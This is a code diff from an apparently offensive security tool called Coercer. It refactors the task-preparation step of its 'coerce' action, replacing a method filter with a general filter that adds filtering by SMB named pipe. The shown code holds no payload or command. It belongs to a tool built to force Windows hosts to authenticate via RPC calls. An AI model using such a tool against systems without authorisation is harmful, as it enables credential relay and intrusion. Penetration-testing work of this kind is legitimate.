@@ -6,7 +6,7 @@
 
 
 import time
-from coercer.core.MethodFilter import MethodFilter
+from coercer.core.Filter import Filter
 from coercer.core.utils import generate_exploit_path_from_template
 from coercer.network.DCERPCSession import DCERPCSession
 from coercer.structures.TestResult import TestResult
@@ -17,9 +17,10 @@ from coercer.network.smb import can_connect_to_pipe, can_bind_to_interface
 def action_coerce(target, available_methods, options, credentials, reporter):
     reporter.verbose = True
 
-    method_filter = MethodFilter(
+    filter = Filter(
         filter_method_name=options.filter_method_name,
-        filter_protocol_name=options.filter_protocol_name
+        filter_protocol_name=options.filter_protocol_name,
+        filter_pipe_name=options.filter_pipe_name
     )
 
     # Preparing tasks ==============================================================================================================
@@ -30,7 +31,7 @@ def action_coerce(target, available_methods, options, credentials, reporter):
             for method in sorted(available_methods[method_type][category].keys()):
                 instance = available_methods[method_type][category][method]["class"]
 
-                if method_filter.matches_filter(instance):
+                if filter.method_matches_filter(instance):
                     for access_type, access_methods in instance.access.items():
                         if access_type not in tasks.keys():
                             tasks[access_type] = {}
@@ -39,17 +40,18 @@ def action_coerce(target, available_methods, options, credentials, reporter):
                         if access_type == "ncan_np":
                             for access_method in access_methods:
                                 namedpipe, uuid, version = access_method["namedpipe"], access_method["uuid"], access_method["version"]
-                                if namedpipe not in tasks[access_type].keys():
-                                    tasks[access_type][namedpipe] = {}
+                                if filter.pipe_matches_filter(namedpipe):
+                                    if namedpipe not in tasks[access_type].keys():
+                                        tasks[access_type][namedpipe] = {}
 
-                                if uuid not in tasks[access_type][namedpipe].keys():
-                                    tasks[access_type][namedpipe][uuid] = {}
+                                    if uuid not in tasks[access_type][namedpipe].keys():
+                                        tasks[access_type][namedpipe][uuid] = {}
 
-                                if version not in tasks[access_type][namedpipe][uuid].keys():
-                                    tasks[access_type][namedpipe][uuid][version] = []
+                                    if version not in tasks[access_type][namedpipe][uuid].keys():
+                                        tasks[access_type][namedpipe][uuid][version] = []
 
-                                if instance not in tasks[access_type][namedpipe][uuid][version]:
-                                    tasks[access_type][namedpipe][uuid][version].append(instance)
+                                    if instance not in tasks[access_type][namedpipe][uuid][version]:
+                                        tasks[access_type][namedpipe][uuid][version].append(instance)
 
     # Executing tasks =======================================================================================================================
 
